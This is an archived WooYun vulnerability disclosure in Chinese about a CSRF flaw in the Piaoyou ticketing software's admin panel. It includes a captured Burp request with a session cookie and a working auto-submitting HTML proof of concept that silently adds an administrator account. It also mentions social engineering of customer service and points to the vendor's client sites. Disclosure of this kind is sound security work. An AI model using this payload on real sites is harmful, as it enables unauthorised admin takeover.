乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-16: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开
看见待认领那边………………然后社工下了客服拿到网页地址 票友软件致力于票务行业代理人和广大业务部提供基于Internet的各项专业基础服务和增值服务,在IT领域,为计算机、网络、信息客户提供软件平台解决方案的专业信息科技公司,重点从事互联网业务。 秉承用户需求至上的宗旨,立足于技术为本、兼收并蓄,博采众长的原则,票友软件凭借雄厚的技术开发实力,已经从纯粹的技术服务商成长为Internet服务器端软件及完整解决方案的提供商。长期以来,为了有效地提高网络集成和系统平台建设的服务品质和竞争力,围绕网络服务业,我公司在包括NT、Linux平台上做了大量的软件开发工作,几乎涵盖了一般商业企业互联网公司应用的主要方面。已经开发了大量的商业软件。这些应用系统对网络服务业务起到了有效的支持作用。同时,也为企业用户提供了更广阔的市场前景,更强大的营销力度和网站推广手段。 全方位的技术支持服务,为您24小时提供电话、邮件、在线交流等咨询及售后服务!专业技术人员贯通售前、售中、售后各个环节的服务实施和衔接;对本地客户实施隔天预约免费上门服务,异地客户实施电话、远程控制、在线交流等多种服务方式,建立规范的客户信息资料,对服务记录、服务监督与投诉等过程进行有效跟踪管理。
然后进入后台后。看见能够添加管理员
打开burp抓下包看看是怎么样带入数据库的
POST /Ajax/users.ashx HTTP/1.1Host: demo.piaoyou.orgUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://demo.piaoyou.org/System/user_set.aspxContent-Length: 194Cookie: ASP.NET_SessionId=qngxhf3hwkgpf0bsehu2k4li; pycookie=loginname=admin&truename=%e7%b3%bb%e7%bb%9f%e7%ae%a1%e7%90%86%e5%91%98&flag=1&datagroup=&kefugroup=%e7%bd%91%e7%bb%9c%e9%83%a8&kpgroup=0&kpdian=none%7c%e5%a4%a9%e5%9c%b0%e8%a1%8c%7c%e4%b8%8d%e5%a4%9c%e5%9f%8e%7c%e4%bb%8a%e6%97%a5%e5%a4%a9%e4%b8%8b%e9%80%9a%7c%e5%8d%97%e8%88%aa%e7%bd%91%e7%ab%99%7c%e5%9b%bd%e8%88%aa%7c%e7%bd%91%e7%bb%9c%e8%ae%a2%e5%8d%95%7c%e4%bb%8a%e6%97%a5%e5%a4%a9%e4%b8%8b%e9%80%9a123%7cConnection: keep-alivePragma: no-cacheCache-Control: no-cachefs=0&id=0&roles=52&username=test1&yusername=&pwd=123456&truename=%E6%B5%8B%E8%AF%952&sex=%E7%94%B7&age=1900-1-1&mob=&hk=&sfz=&zw=&kefugroup=%E9%94%80%E5%94%AE%E9%83%A8&week=1,2,3,4,5,6,0,×=
把它post进去。下面提供下poc
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>OWASP CRSFTester Demonstration</title></head><body onload="javascript:fireForms()"><script language="JavaScript">var pauses = new Array( "187","78" );function pausecomp(millis){ var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < millis);}function fireForms(){ var count = 2; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); pausecomp(pauses[i]); }} </script><H2>OWASP CRSFTester Demonstration</H2><form method="POST" name="form0" action="http://demo.piaoyou.org:80/Ajax/users.ashx"><input type="hidden" name="fs" value="0"/><input type="hidden" name="id" value="0"/><input type="hidden" name="roles" value="52"/><input type="hidden" name="username" value="test"/><input type="hidden" name="yusername" value=""/><input type="hidden" name="pwd" value="123456"/><input type="hidden" name="truename" value="测试"/><input type="hidden" name="sex" value="男"/><input type="hidden" name="age" value="1900-1-1"/><input type="hidden" name="mob" value=""/><input type="hidden" name="hk" value=""/><input type="hidden" name="sfz" value=""/><input type="hidden" name="zw" value=""/><input type="hidden" name="kefugroup" value="销售部"/><input type="hidden" name="week" value="1,2,3,4,5,6,0,"/><input type="hidden" name="times" value=""/></form><form method="POST" name="form1" action="http://demo.piaoyou.org:80/Ajax/kefu_check.ashx"><input type="hidden" name="name" value="value"/> </form></body></html>
打开后…………
加强验证。旗下客户网站看看有没有这个错误。http://piaoyou.org/case_web.htm这里是客户网站。得注意啊
未能联系到厂商或者厂商积极拒绝